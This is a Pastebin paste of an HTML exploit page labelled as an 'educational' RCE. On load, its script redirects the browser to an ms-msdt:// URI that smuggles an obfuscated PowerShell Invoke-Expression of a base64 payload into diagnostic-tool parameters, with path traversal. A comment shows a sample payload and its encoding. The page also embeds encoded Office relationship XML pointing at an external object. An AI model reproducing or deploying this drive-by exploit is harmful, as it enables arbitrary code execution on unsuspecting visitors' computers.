API tools faq
paste
jembutqribo

$.{RCE} | Content for Educationally Purpose #JQ

jembutqribo
Nov 3rd, 2022
139
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 7.96 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head><body>
  4. <meta charset="UTF-8" />
  5. <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  6. <!--
  7. /**
  8.   * [DISCLAIMER : "Used it, at own risk!"]
  9.   * RCE for educationally learn and recognize purpose.
  10.   * This content is only for educational Cyber Security purpose for anyone to learn it.
  11.   * Using it, for bad purposes. We always monitor it all.
  12.   * << "Hacking" can be as illegal, it can be as legal,
  13.   * depending on the perspective from which
  14.   * and the purpose of doing it! quote from xsvs:team. >>
  15.   * Signed #JQ Hack'B {xsvs:realteam} ~ `Reverse Social Engineering and Digital Analytics`  
  16.  **/
  17. -->
  18. <link rel="pingback"
  19.      type="application/xml"
  20.      href="data:application/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/PjxSZWxhdGlvbnNoaXBzIHhtbHM9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9wYWNrYWdlLzIwMDYvcmVsYXRpb25zaGlwcyI+PFJlbGF0aW9uc2hpcHMgSWQ9InJJZDMiIFR5cGU9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMvd2ViU2V0dGluZ3MiIFRhcmdldD0id2ViU2V0dGluZ3MueG1sIi8+PFJlbGF0aW9uc2hpcHMgSWQ9InJJZDIiIFR5cGU9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMvc2V0dGluZ3MiIFRhcmdldD0ic2V0dGluZ3MueG1sIi8+PFJlbGF0aW9uc2hpcHMgSWQ9InJJZDEiIFR5cGU9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMvc3R5bGVzIiANClRhcmdldD0ic3R5bGVzLnhtbCIgLz48UmVsYXRpb25zaGlwcyBJZD0icklkOTk2IiBUeXBlPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvb2ZmaWNlRG9jdW1lbnQvMjAwNi9yZWxhdGlvbnNoaXBzL29sZU9iamVjdCIgVGFyZ2V0PSJ3aW5kb3cubG9jYXRpb24ucGF0aG5hbWUgKyAnLmh0bWwhJyIgVGFyZ2V0TW9kZT0iRXh0ZXJuYWwiLz48UmVsYXRpb25zaGlwcyBJZD0icklkNSIgVHlwZT0iaHR0cDovL3NjaGVtYXMub3BlbnhtbGZvcm1hdHMub3JnL29mZmljZURvY3VtZW50LzIwMDYvcmVsYXRpb25zaGlwcy90aGVtZSIgVGFyZ2V0PSJ0aGVtZS54bWwiLz48UmVsYXRpb25zaGlwcyBJZD0icklkNCIgVHlwZT0iaHR0cDovL3NjaGVtYXMub3BlbnhtbGZvcm1hdHMub3JnL29mZmljZURvY3VtZW50LzIwMDYvcmVsYXRpb25zaGlwcy9mb250VGFibGUiIFRhcmdldD0iZm9udFRhYmxlLnhtbCIvPg"
  21.  charset="UTF-8"
  22.  crossorigin="anonymous"/>
  23. <h1> responseTo = `${https://pastebin.com/message/compose?to=jembutqribo}`; </h1>
  24. </body></head>
  25. <script type="text/javascript">
  26. function triggered() {
  27.   window.addEventListener("contextmenu", ()=> {
  28.       trigger = "javascript:document.body.contentEditable='true';document.designMode='on';alert('Done!');void 0";
  29.       location.href = trigger;
  30.   });
  31.   whatUp = "data:application/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/PjxSZWxhdGlvbnNoaXBzIHhtbHM9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9wYWNrYWdlLzIwMDYvcmVsYXRpb25zaGlwcyI+PFJlbGF0aW9uc2hpcHMgSWQ9InJJZDMiIFR5cGU9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMvd2ViU2V0dGluZ3MiIFRhcmdldD0id2ViU2V0dGluZ3MueG1sIi8+PFJlbGF0aW9uc2hpcHMgSWQ9InJJZDIiIFR5cGU9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMvc2V0dGluZ3MiIFRhcmdldD0ic2V0dGluZ3MueG1sIi8+PFJlbGF0aW9uc2hpcHMgSWQ9InJJZDEiIFR5cGU9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMvc3R5bGVzIiANClRhcmdldD0ic3R5bGVzLnhtbCIgLz48UmVsYXRpb25zaGlwcyBJZD0icklkOTk2IiBUeXBlPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvb2ZmaWNlRG9jdW1lbnQvMjAwNi9yZWxhdGlvbnNoaXBzL29sZU9iamVjdCIgVGFyZ2V0PSJ3aW5kb3cubG9jYXRpb24ucGF0aG5hbWUgKyAnLmh0bWwhJyIgVGFyZ2V0TW9kZT0iRXh0ZXJuYWwiLz48UmVsYXRpb25zaGlwcyBJZD0icklkNSIgVHlwZT0iaHR0cDovL3NjaGVtYXMub3BlbnhtbGZvcm1hdHMub3JnL29mZmljZURvY3VtZW50LzIwMDYvcmVsYXRpb25zaGlwcy90aGVtZSIgVGFyZ2V0PSJ0aGVtZS54bWwiLz48UmVsYXRpb25zaGlwcyBJZD0icklkNCIgVHlwZT0iaHR0cDovL3NjaGVtYXMub3BlbnhtbGZvcm1hdHMub3JnL29mZmljZURvY3VtZW50LzIwMDYvcmVsYXRpb25zaGlwcy9mb250VGFibGUiIFRhcmdldD0iZm9udFRhYmxlLnhtbCIvPg";
  32.   xmlReturn = document.createElement("link");
  33.   xmlReturn.rel = "pingback";  
  34.   xmlReturn.href = whatUp;
  35.   xmlReturn.type = "application/xml";
  36.   xmlReturn.crossOrigin = "anonymous";
  37.   document.body.appendChild(xmlReturn);
  38.   location.href = "ms-msdt://id PCWDiagnotic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF-8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{{*RCE-BASE64-HERE*}}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
  39. /**
  40.   * {{*RCE-BASE64-HERE*}} as payload content eg :
  41.   *  Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('HelloWorld!'); start https://pastebin.com/u/jemBUTqriBO
  42.   *
  43.   * {{*RCE-BASE64-HERE*}} as payload base64 result :
  44.   * QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBQcmVzZW50YXRpb25Db3JlLFByZXNlbnRhdGlvbkZyYW1ld29yazsgW1N5c3RlbS5XaW5kb3dzLk1lc3NhZ2VCb3hdOjpTaG93KCdIZWxsbycpOyBzdGFydCBodHRwczovL3Bhc3RlYmluLmNvbS91L2plbUJVVHFyaUJP
  45.   *
  46.   *
  47. 77+9IGh0dHBzOi8vaXBmb3VuZGVyLm5ldC8/c3BvbnNvcl9pZD0xQkM1MjdEM0QwOTk4NUNGJnNwb25zb3I9cHNpcGhvbiZjbGllbnRfcmVnaW9uPVVTJmNsaWVudF9hc249MTMxMTExJmNsaWVudF9wbGF0Zm9ybT13aW5kb3dzJnNlY3JldD01ODBFZmpFSTI5eEwzaG95VTZkZ1A0dlNFVnhkY0dJN0pERmt4Z2pkczdQSHVsU0VGMHdtT1JwdnpicXh5VHdZdHBvd3NZNHhNRm5mV0VuVGdoZTZsOGppVjlLNVFTWm9pcjJpNmZEZUtKRDZFaEw2RGtvWVRFTXUyRUU5WUp2eTNMZENVWjduY2RWQzZpcGdXeDA2d3pudkRMYlkxYWpmY2ZSR0NwZnNRSmVpMnE2dGIwR1NGaDFRSzN4M3FYS3d5am1OUGM1SiZwc2lyZWFzb249Y29ubmVjdCZwc2ljYXNoPWV5SnRaWFJoWkdGMFlTSTZleUpqYkdsbGJuUmZjbVZuYVc5dUlqb2lTVVFpTENKamJHbGxiblJmZG1WeWMybHZiaUk2SWpFM05DSXNJbkJ5YjNCaFoyRjBhVzl1WDJOb1lXNXVaV3hmYVdRaU9pSTVNa0ZCUTBNMVFrRkNSVEE1TkRSRElpd2ljM0J2Ym5OdmNsOXBaQ0k2SWpGQ1F6VXlOMFF6UkRBNU9UZzFRMFlpTENKMWMyVnlYMkZuWlc1MElqb2lVSE5wY0dodmJpMVFjMmxEWVhOb0xWZHBibVJ2ZDNNaUxDSjJJam94ZlN3aWRHbHRaWE4wWVcxd0lqb2lNakF5TWkweE1TMHdNMVF5TVRveE1Eb3hNeTQ0TWpsYUlpd2lkRzlyWlc1eklqb2lkRzlyWlc1ZmRISmhZMnRsY2w5bFlYSnVaWEpmWldWaFpXRmhZbU15TVRjM01qVTJPR1kwTUdFeVkyWmxOVEpqWVRRNE9EbGlOamczWW1FellqUXdOMlJqT1Raak5tRmxOMlExWVRNMk9EZzVNekl5TWlJc0luWWlPakY5IO+/vQ
  48.  **/
  49. }
  50. document.addEventListener("load", triggered);
  51. window.addEventListener("load", triggered);
  52. /* 77+9IDwhLS0gCiAvKiogCiAgICogW0Rpc2NsYWltZXIgOiAiVXNlZCBpdCwgYXQgb3duIHJpc2shIl0gCiAgICogVGhpcyBjb250ZW50IGlzIG9ubHkgZm9yIGVkdWNhdGlvbmFsIEN5YmVyIFNlY3VyaXR5IHB1cnBvc2UgZm9yIGFueW9uZS4gCiAgICogVXNpbmcgaXQsIGZvciBiYWQgcHVycG9zZXMuIFdlIGFsd2F5cyBtb25pdG9yIGl0LiAKICAgKiA8PCAiSGFja2luZyIgY2FuIGJlIGFzIGlsbGVnYWwsIGl0IGNhbiBiZSBhcyBsZWdhbCwgCiAgICogZGVwZW5kaW5nIG9uIHRoZSBwZXJzcGVjdGl2ZSBmcm9tIHdoaWNoIAogICAqIGFuZCB0aGUgcHVycG9zZSBvZiBkb2luZyBpdCEgcXVvdGUgZnJvbSB4c3ZzOnRlYW0uID4+IAogICAqIFNpZ25lZCAjSlEgSGFja0Ige3hzdnM6cmVhbHRlYW19IAogICoqLyAKLS0+IO+/vQ */
  53. </script>
  54. <!--[
  55. PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pgo8UmVsYXRpb25zaGlwcyB4bWxzPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvcGFja2FnZS8yMDA2L3JlbGF0aW9uc2hpcHMiPgo8UmVsYXRpb25zaGlwcyBJZD0icklkMyIgClR5cGU9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMvd2ViU2V0dGluZ3MiIApUYXJnZXQ9IndlYlNldHRpbmdzLnhtbCIvPgo8UmVsYXRpb25zaGlwcyBJZD0icklkMiIgClR5cGU9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMvc2V0dGluZ3MiIApUYXJnZXQ9InNldHRpbmdzLnhtbCIvPgo8UmVsYXRpb25zaGlwcyBJZD0icklkMSIgClR5cGU9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMvc3R5bGVzIiAKVGFyZ2V0PSJzdHlsZXMueG1sIiAvPgo8UmVsYXRpb25zaGlwcyBJZD0icklkOTk2IiAKVHlwZT0iaHR0cDovL3NjaGVtYXMub3BlbnhtbGZvcm1hdHMub3JnL29mZmljZURvY3VtZW50LzIwMDYvcmVsYXRpb25zaGlwcy9vbGVPYmplY3QiIApUYXJnZXQ9IndpbmRvdy5sb2NhdGlvbi5wYXRobmFtZSArICchJyIgClRhcmdldE1vZGU9IkV4dGVybmFsIi8+CjxSZWxhdGlvbnNoaXBzIElkPSJySWQ1IiAKVHlwZT0iaHR0cDovL3NjaGVtYXMub3BlbnhtbGZvcm1hdHMub3JnL29mZmljZURvY3VtZW50LzIwMDYvcmVsYXRpb25zaGlwcy90aGVtZSIgClRhcmdldD0idGhlbWUueG1sIiAvPgo8UmVsYXRpb25zaGlwcyBJZD0icklkNCIgClR5cGU9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMvZm9udFRhYmxlIiAKVGFyZ2V0PSJmb250VGFibGUueG1sIiAvPg
  56. ]-->
  57. </html>
Tags: xml JavaScript powershell RCE Educationally
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!